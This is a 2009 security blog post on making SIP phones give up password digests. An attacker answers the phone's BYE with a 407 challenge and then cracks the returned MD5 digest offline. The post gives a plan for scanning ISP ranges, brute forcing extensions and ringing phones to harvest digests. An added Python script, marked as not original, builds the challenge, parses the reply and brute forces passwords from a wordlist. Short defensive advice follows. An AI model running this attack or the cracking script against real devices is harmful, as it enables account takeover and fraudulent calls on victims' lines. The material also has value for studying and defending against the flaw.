Get the password from ANY SIP device?!?! It is fully possible!
March 26, 2009
If I know the IP address of your SIP User-Agent and your extension, I can get your password. Not true? Here is how Sandro and I did it! Sandro Gauci also has a tool (voippack for Canvas) which automates the whole process; you can watch the video here!
The fault is that a User-Agent answers an authentication challenge even when there is no reason for one. We first send an INVITE; the User-Agent rings and the user picks up the phone. When the user hangs up, the User-Agent sends a BYE, and we reply to that BYE with an authentication challenge. The User-Agent answers with a SIP Digest response: an MD5 hash computed from the password (together with the username, realm and nonce), not the password itself. Because we chose the nonce, we can brute force this digest offline at our leisure.
The master plan:
- Find out which ISPs deliver VoIP. Look up their IP ranges at RIPE. Scan those ranges for SIP devices.
- Get the extensions they are using (or their ranges of usernames, e.g. phone numbers), then brute force those ranges against each IP.
- Send an INVITE to the correct extension and the phone rings. When the user hangs up, we have the digest.
We make the phone authenticate its own BYE. When the SIP User-Agent sends the BYE message, we answer with “407 Proxy Authentication Required” carrying a realm and nonce of our choosing, and the SIP User-Agent re-sends the BYE with a Proxy-Authorization header containing the MD5 digest response derived from its password.
- The SIP stack is not tied to the IP layer. Why does the SIP User-Agent answer SIP messages from IPs other than the SIP Registrar it is connected to? There should automatically be a rule saying “drop all SIP messages from any server other than the one I registered with!”
- Why does the User-Agent blindly answer a challenge on the BYE message? Just send it a “407” and the SIP UA answers with the digest…
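The exchange described above, as an added example that is not part of the original post and is not Sandro's voippack code: a small Python script that builds the attacker's 407 challenge, builds the BYE that a vulnerable User-Agent re-sends with a Proxy-Authorization header (the extension, realm, nonce and password in the sample are constructed here for illustration), parses that header and brute forces the digest offline against a wordlist. Realm and nonce are attacker-chosen in this attack, which is why the cracking can be done offline and, for a known username, even precomputed.

```python
import hashlib
import re

# SIP uses HTTP Digest (RFC 2617 as profiled by RFC 3261). With no qop and
# algorithm=MD5 the response is MD5(HA1:nonce:HA2), where
# HA1 = MD5(username:realm:password) and HA2 = MD5(method:uri).
def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def digest_response(username, realm, password, nonce, method, uri):
    ha1 = md5_hex(f"{username}:{realm}:{password}")
    ha2 = md5_hex(f"{method}:{uri}")
    return md5_hex(f"{ha1}:{nonce}:{ha2}")


def make_challenge(realm, nonce):
    """The 407 the attacker sends in reply to the UA's BYE (attacker picks realm and nonce)."""
    return (
        "SIP/2.0 407 Proxy Authentication Required\r\n"
        f'Proxy-Authenticate: Digest realm="{realm}", nonce="{nonce}", algorithm=MD5\r\n'
        "Content-Length: 0\r\n\r\n"
    )


def make_authenticated_bye(username, realm, password, nonce, uri):
    """The BYE as a vulnerable UA re-sends it, now carrying Proxy-Authorization.
    Used here only to construct a sample message; a real UA would produce this."""
    resp = digest_response(username, realm, password, nonce, "BYE", uri)
    return (
        f"BYE {uri} SIP/2.0\r\n"
        f'Proxy-Authorization: Digest username="{username}", realm="{realm}", '
        f'nonce="{nonce}", uri="{uri}", response="{resp}", algorithm=MD5\r\n'
        "Content-Length: 0\r\n\r\n"
    )


def parse_proxy_authorization(msg):
    """Pull method and the quoted Digest parameters out of a SIP request."""
    request_line, *header_lines = msg.split("\r\n")
    method = request_line.split(" ", 1)[0]
    for line in header_lines:
        if line.lower().startswith("proxy-authorization:"):
            params = dict(re.findall(r'(\w+)="([^"]*)"', line))
            params["method"] = method
            return params
    return None


def crack_digest(params, candidates):
    """Offline brute force: recompute the response for each candidate password."""
    for pw in candidates:
        if digest_response(params["username"], params["realm"], pw,
                           params["nonce"], params["method"], params["uri"]) == params["response"]:
            return pw
    return None


def demo():
    # Constructed sample values (assumed extension, realm, nonce, password; not from the page).
    realm = "sip.example.net"
    nonce = "5e0b3b6c"          # attacker-chosen in the 407; the UA simply echoes it
    uri = "sip:2001@sip.example.net"
    challenge = make_challenge(realm, nonce)          # what we send to the phone
    bye = make_authenticated_bye("2001", realm, "s3cret", nonce, uri)  # what the phone sends back
    params = parse_proxy_authorization(bye)
    wordlist = ["1234", "password", "2001", "s3cret", "letmein"]  # constructed wordlist
    return crack_digest(params, wordlist)


if __name__ == "__main__":
    print(demo())
```

Digest cracking is limited only by how fast MD5 can be computed, which is why the provider advice below (long passwords drawn from the full character set) matters far more than password rotation: a short numeric SIP secret falls in seconds.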
Units tested (and we managed to get the password)
The units that will be tested further:
- Thompson ST2030
How to protect yourself (for users)
- Make sure your VoIP provider has credit limits! You don’t want to get a huge phone bill!
- Report any unusual phone calls or strange behavior!
How to protect yourself (for VoIP providers)
- Protect your SIP user-agents! This is hard with the Fritz units, which are normally used as routers.
- Use very long SIP passwords and use every character that is possible (#¤%” and others)!
- Change the SIP password regularly
- Run VoIP honeypots to detect scans in your area
How serious do you think this is? Write your comments now!